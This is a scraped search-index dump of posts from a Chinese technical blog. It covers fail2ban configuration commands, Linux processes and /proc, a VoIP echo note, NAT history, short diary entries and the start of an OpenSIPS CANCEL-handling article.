addignoreregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which should match pattern to exclude for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for ignoreregex set \u0026lt;JAIL\u0026gt; findtime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; for which the filter will look back for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; bantime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; a host will be banned for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; datepattern \u0026lt;PATTERN\u0026gt; sets the \u0026lt;PATTERN\u0026gt; used to match date/times for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; usedns \u0026lt;VALUE\u0026gt; sets the usedns mode for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; attempt \u0026lt;IP\u0026gt; [\u0026lt;failure1\u0026gt; ... \u0026lt;failureN\u0026gt;] manually notify about \u0026lt;IP\u0026gt; failure set \u0026lt;JAIL\u0026gt; banip \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Ban \u0026lt;IP\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; unbanip [--report-absent] \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Unban \u0026lt;IP\u0026gt; in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxretry \u0026lt;RETRY\u0026gt; sets the number of failures \u0026lt;RETRY\u0026gt; before banning the host for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxlines \u0026lt;LINES\u0026gt; sets the number of \u0026lt;LINES\u0026gt; to buffer for regex search for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addaction \u0026lt;ACT\u0026gt;[ \u0026lt;PYTHONFILE\u0026gt; \u0026lt;JSONKWARGS\u0026gt;] adds a new action named \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt;. Optionally for a Python based action, a \u0026lt;PYTHONFILE\u0026gt; and \u0026lt;JSONKWARGS\u0026gt; can be specified, else will be a Command Action set \u0026lt;JAIL\u0026gt; delaction \u0026lt;ACT\u0026gt; removes the action \u0026lt;ACT\u0026gt; from \u0026lt;JAIL\u0026gt; COMMAND ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart \u0026lt;CMD\u0026gt; sets the start command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop \u0026lt;CMD\u0026gt; sets the stop command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck \u0026lt;CMD\u0026gt; sets the check command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban \u0026lt;CMD\u0026gt; sets the ban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban \u0026lt;CMD\u0026gt; sets the unban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout \u0026lt;TIMEOUT\u0026gt; sets \u0026lt;TIMEOUT\u0026gt; as the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; \u0026lt;VALUE\u0026gt; sets the \u0026lt;VALUE\u0026gt; of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;METHOD\u0026gt;[ \u0026lt;JSONKWARGS\u0026gt;] calls the \u0026lt;METHOD\u0026gt; with \u0026lt;JSONKWARGS\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; JAIL INFORMATION get \u0026lt;JAIL\u0026gt; logpath gets the list of the monitored files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; logencoding gets the encoding of the log files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; journalmatch gets the journal filter match for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreself gets the current value of the ignoring the own IP addresses get \u0026lt;JAIL\u0026gt; ignoreip gets the list of ignored IP addresses for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignorecommand gets ignorecommand of \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; failregex gets the list of regular expressions which matches the failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreregex gets the list of regular expressions which matches patterns to ignore for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; findtime gets the time for which the filter will look back for failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; bantime gets the time a host is banned for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; datepattern gets the patern used to match date/times for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; usedns gets the usedns setting for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxretry gets the number of failures allowed for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxmatches gets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxlines gets the number of lines to buffer for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actions gets a list of actions for \u0026lt;JAIL\u0026gt; COMMAND ACTION INFORMATION get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart gets the start command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop gets the stop command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck gets the check command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban gets the ban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban gets the unban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout gets the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION INFORMATION get \u0026lt;JAIL\u0026gt; actionproperties \u0026lt;ACT\u0026gt; gets a list of properties for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actionmethods \u0026lt;ACT\u0026gt; gets a list of methods for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; gets the value of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; Report bugs to https://github.com/fail2ban/fail2ban/issues Report bugs to https://github.com/fail2ban/fail2ban/issues\n","permalink":"https://wdd.js.org/posts/2020/04/ih9pz2/","summary":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client","title":"自动IP拦截工具fail2ban使用教程"},{"content":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后在kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 runing 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名lsof -p 进程号lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.17.so rtpproxy 2073 root mem REG 253,0 44448 33617041 /usr/lib64/librt-2.17.so rtpproxy 2073 root mem REG 253,0 19776 34757658 /usr/lib64/libdl-2.17.so rtpproxy 2073 root mem REG 253,0 1139680 34757660 /usr/lib64/libm-2.17.so rtpproxy 2073 root mem REG 253,0 144792 33617035 /usr/lib64/libpthread-2.17.so rtpproxy 2073 root mem REG 253,0 164112 33595530 /usr/lib64/ld-2.17.so rtpproxy 2073 root 0u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 1u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 2u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 3u IPv4 17641 0t0 UDP 192.168.40.100:7890 rtpproxy 2073 root 4u unix 0xffff880079260000 0t0 17642 socket rtpproxy 2073 root 8u IPv4 72592335 0t0 UDP 192.168.40.100:25257 进程都有资源限制 /proc/pid/limits\n以rtpproxy为例子,rtpproxy的pid为2073, /proc/pid/limits文件记录进程的资源限制\n进程都有环境变量 /proc/pid/environ\n进程都有参数 /proc/pid/cmdline\nrtpproxy-A192.168.40.100-l192.168.40.100-sudp:192.168.40.1007890-F-m20000-M40000-L20000-dDBUG[root@localhost 2073]# 进程都有名字 /proc/2073/status\nName:\trtpproxy State:\tS (sleeping) Tgid:\t2073 Ngid:\t0 Pid:\t2073 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 进程皆有退出码 非0的退出码一般是异常退出 $? [root@localhost 2073]# cat \u0026#34;test\u0026#34; [root@localhost 2073]# echo $? 1 [root@localhost 2073]# echo $? 0 进程可以fork 孤儿进程 孤儿进程:一个父进程退出,而它的一个或多个子进程还在运行,那么那些子进程将成为孤儿进程。孤儿进程将被init进程(进程号为1)所收养,并由init进程对它们完成状态收集工作。\n僵尸进程 僵尸进程:一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用wait或waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵死进程。 僵尸进程占用进程描述符,无法释放,会导致系统无法正常的创建进程。\n\u0026gt; cat /proc/sys/kernel/pid_max 32768 进程间通信 进程之间的所有资源都是完全隔离的,所以进程之间如何通信呢?\n在liunx底层,有个套接字API\nSOCKET socket (int domain, int type, int protocol) domain 表示域,一般由两个值 AF_INET 即因特网 AF_LOCAL 用于同一台机器上的进程间通信 type 表示类型 SOCK_STREAM 提供可靠的、全双工、面向链接的字节流,一般就是TCP SOCK_DGRAM 提供不可靠、尽力而为的数据报服务,一般就是UDP SOCK_RAW 允许直接访问IP层原生的数据报 也就是说,进程间通信,实际上也是用的socket\n守护进程 守护进程一般是后台运行的进程,例如sshd, mysqld, dockerd等等,他们的特点就是他们的ppid是1, 也就是说,守护进程也是孤儿进程的一种。\nroot 9696 1 0 Oct06 ? 00:05:16 /usr/sbin/sshd -D idle进程与init进程 Linux下有3个特殊的进程**,idle进程(PID = 0), init进程(PID = 1)和kthreadd(PID = 2)**\nidle进程由系统自动创建, 运行在内核态。idle进程其pid=0,其前身是系统创建的第一个进程,也是唯一一个没有通过fork或者kernel_thread产生的进程。完成加载系统后,演变为进程调度、交换 init进程由idle通过kernel_thread创建,在内核空间完成初始化后, 加载init程序, 并最终用户空间。由0进程创建,完成系统的初始化. 是系统中所有其它用户进程的祖先进程 Linux中的所有进程都是有init进程创建并运行的。首先Linux内核启动,然后在用户空间中启动init进程,再启动其他系统进程。在系统启动完成完成后,init将变为守护进程监视系统其他进程。 kthreadd进程由idle通过kernel_thread创建,并始终运行在内核空间, 负责所有内核线程的调度和管理 参考:https://blog.csdn.net/gatieme/article/details/51484562\n线程 ps -m可以在进程之后显示线程。线程的tid也会占用一个/proc/tid目录,和进程的/proc/pid 目录没什么区别。\n只不过进程的Tgid(线程组Id)是自己的pid, 而其他线程的Tgid是主线程的pid。\nps -em -o pid,tid,command | grep rtpproxy -A10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - 进程与线程的区别 关于/proc目录 proc目录是一个虚拟的文件系统,实际上是内核的数据结构的映射。里面的大部分的文件都是只读的,只有少部分是可写的。\n关于进程运行时信息,都可以在这个目录找到。\n下面的链接详细的介绍了每个目录的作用。\nhttps://www.linux.com/news/discover-possibilities-proc-directory/\nhttps://www.tldp.org/LDP/sag/html/proc-fs.html\nhttp://man7.org/linux/man-pages/man5/proc.5.html\n思考\n如何获取某个执行进程的可执行文件的路径? proc目录下的文件有何特点? 以下的几个文件是比较重要的,着重说明一下。\ncmdline 执行参数 environ 环境变量 ** exe -\u0026gt; /usr/local/bin/rtpproxy 可执行文件位置** ** fd 文件描述符信息** ** limits 资源限制** oom killer机制:杀掉最胖的那个进程 oom_adj oom_score oom_score_adj status 状态信息 dr-xr-xr-x. 2 root root 0 Jan 14 15:56 attr -rw-r--r--. 1 root root 0 Jan 14 15:56 autogroup -r--------. 1 root root 0 Jan 14 15:56 auxv -r--r--r--. 1 root root 0 Nov 6 17:59 cgroup --w-------. 1 root root 0 Jan 14 15:56 clear_refs -r--r--r--. 1 root root 0 Nov 6 10:26 cmdline -rw-r--r--. 1 root root 0 Nov 6 17:59 comm -rw-r--r--. 1 root root 0 Jan 14 15:56 coredump_filter -r--r--r--. 1 root root 0 Jan 14 15:56 cpuset lrwxrwxrwx. 1 root root 0 Jan 14 15:56 cwd -\u0026gt; / -r--------. 1 root root 0 Jan 14 15:56 environ lrwxrwxrwx. 1 root root 0 Nov 6 17:59 exe -\u0026gt; /usr/local/bin/rtpproxy dr-x------. 2 root root 0 Jan 14 15:56 fd dr-x------. 2 root root 0 Jan 14 15:56 fdinfo -rw-r--r--. 1 root root 0 Jan 14 15:56 gid_map -r--------. 1 root root 0 Jan 14 15:56 io -r--r--r--. 1 root root 0 Jan 14 15:56 limits -rw-r--r--. 1 root root 0 Nov 6 17:59 loginuid dr-x------. 2 root root 0 Jan 14 15:56 map_files -r--r--r--. 1 root root 0 Jan 14 15:56 maps -rw-------. 1 root root 0 Jan 14 15:56 mem -r--r--r--. 1 root root 0 Jan 14 15:56 mountinfo -r--r--r--. 1 root root 0 Jan 14 15:56 mounts -r--------. 1 root root 0 Jan 14 15:56 mountstats dr-xr-xr-x. 5 root root 0 Jan 14 15:56 net dr-x--x--x. 2 root root 0 Jan 14 15:56 ns -r--r--r--. 1 root root 0 Jan 14 15:56 numa_maps -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_adj -r--r--r--. 1 root root 0 Jan 14 15:56 oom_score -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_score_adj -r--r--r--. 1 root root 0 Jan 14 15:56 pagemap -r--r--r--. 1 root root 0 Jan 14 15:56 personality -rw-r--r--. 1 root root 0 Jan 14 15:56 projid_map lrwxrwxrwx. 1 root root 0 Jan 14 15:56 root -\u0026gt; / -rw-r--r--. 1 root root 0 Jan 14 15:56 sched -r--r--r--. 1 root root 0 Nov 6 17:59 sessionid -rw-r--r--. 1 root root 0 Jan 14 15:56 setgroups -r--r--r--. 1 root root 0 Jan 14 15:56 smaps -r--r--r--. 1 root root 0 Jan 14 15:56 stack -r--r--r--. 1 root root 0 Jan 14 15:56 stat -r--r--r--. 1 root root 0 Jan 14 15:56 statm -r--r--r--. 1 root root 0 Nov 6 10:26 status -r--r--r--. 1 root root 0 Jan 14 15:56 syscall dr-xr-xr-x. 9 root root 0 Jan 14 15:56 task -r--r--r--. 1 root root 0 Jan 14 15:56 timers -rw-r--r--. 1 root root 0 Jan 14 15:56 uid_map -r--r--r--. 1 root root 0 Jan 14 15:56 wchan 工具简介 ps ps有三种风格的使用方式,我们一般使用前两种\nUnix风格 参数以-开头,如-a BSD风格,直接用参数 如a GUN风格,以\u0026ndash;开头 常用的有\nps -ef ps aux VSZ 虚拟内存,单位kb RSS 物理内存,单位kb ➜ 2112 ps -ef | head UID PID PPID C STIME TTY TIME CMD root 1 0 0 2018 ? 01:57:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0 0 2018 ? 00:00:44 [kthreadd] root 3 2 0 2018 ? 00:05:44 [ksoftirqd/0] root 7 2 0 2018 ? 00:08:04 [migration/0] root 8 2 0 2018 ? 00:00:00 [rcu_bh] root 9 2 0 2018 ? 00:00:00 [rcuob/0] root 10 2 0 2018 ? 00:00:00 [rcuob/1] root 11 2 0 2018 ? 00:00:00 [rcuob/2] root 12 2 0 2018 ? 00:00:00 [rcuob/3] ➜ 2112 ps aux | head USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 193524 3572 ? Ss 2018 117:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0.0 0.0 0 0 ? S 2018 0:44 [kthreadd] root 3 0.0 0.0 0 0 ? S 2018 5:44 [ksoftirqd/0] root 7 0.0 0.0 0 0 ? S 2018 8:04 [migration/0] root 8 0.0 0.0 0 0 ? S 2018 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/0] root 10 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/1] root 11 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/2] root 12 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/3] ps 查看线程\n➜ 2118 ps -em -o pid,tid,command | grep rtpproxy -A 10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - cat /proc/2112/status Name:\trtpproxy State:\tS (sleeping) Tgid:\t2112 Ngid:\t0 Pid:\t2112 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 FDSize:\t16384 Groups:\t0 VmPeak:\t390896 kB VmSize:\t259824 kB VmLck:\t0 kB VmPin:\t0 kB VmHWM:\t121708 kB VmRSS:\t3532 kB VmData:\t246120 kB VmStk:\t136 kB VmExe:\t176 kB VmLib:\t3092 kB VmPTE:\t316 kB VmSwap:\t2272 kB Threads:\t7 SigQ:\t2/15086 SigPnd:\t0000000000000000 ShdPnd:\t0000000000000000 SigBlk:\t0000000000000000 SigIgn:\t0000000000001000 SigCgt:\t0000000187804a03 CapInh:\t0000000000000000 CapPrm:\t0000001fffffffff CapEff:\t0000001fffffffff CapBnd:\t0000001fffffffff Seccomp:\t0 Cpus_allowed:\tf Cpus_allowed_list:\t0-3 Mems_allowed:\t00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list:\t0 voluntary_ctxt_switches:\t259223710 nonvoluntary_ctxt_switches:\t2216 nestat netstat -nulp netstat -ntulp netstat -nap lsof Linux下所有信息都是文件,那么查看打开文件就比较重要了。 lisf open file, 查看打开的文件\nlsof -c processName 按照进程名查看 lsof -c pid 按照pid查看 lsof file 查看文件被哪些进程打开 losf -i:8080 查看8080被那个进程占用 top top 1 P M 参考 http://turnoff.us/geek/inside-the-linux-kernel/ 《How Linux Works》 《Operating Systems there easy pieces》 讲虚拟化、并发、持久化三块 《理解Unix进程》 《Linux Shell Script cookbook》 https://www.internalpointers.com/post/gentle-introduction-multithreading https://dev.to/rrampage/surviving-the-linux-oom-killer-2ki9 附件书籍 proc(5) - Linux manual page.pdfCommand Line Text Processing - Sundeep Agarwal.pdfHow Linux Works _ What Every Superuser Sho - Brian Ward(Author).pdfOperating Systems three easy pieces - Unknown.pdf[Sarath Lakshman] Linux Shell Scripting Co - Unknown.pdftcp_ipGao Xiao Bian Cheng __Gai Shan Wang - Unknown.pdf\n","permalink":"https://wdd.js.org/posts/2020/04/pbcbub/","summary":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后在kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 runing 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名lsof -p 进程号lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.","title":"s"},{"content":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩\n","permalink":"https://wdd.js.org/posts/2020/04/ysx4gz/","summary":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩","title":"老年生活"},{"content":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦难耐,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。\n","permalink":"https://wdd.js.org/posts/2020/04/oczker/","summary":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦难耐,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。","title":"简历之吃苦耐劳"},{"content":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然回产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","permalink":"https://wdd.js.org/opensips/ch7/echo-back/","summary":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然回产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","title":"回音问题调研"},{"content":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","permalink":"https://wdd.js.org/opensips/ch1/story-of-nat/","summary":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","title":"漫话NAT的历史todo"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**. This is required in order to guarantee that the CANCEL will end up (via the same SIP route) in the same place as the INVITE.So, the CANCEL must follow up the INVITE. But how to do and script this?\nIf you run OpenSIPS in a stateless mode, there is no other way then taking care of this at script level – apply the same dialplan and routing decisions for the 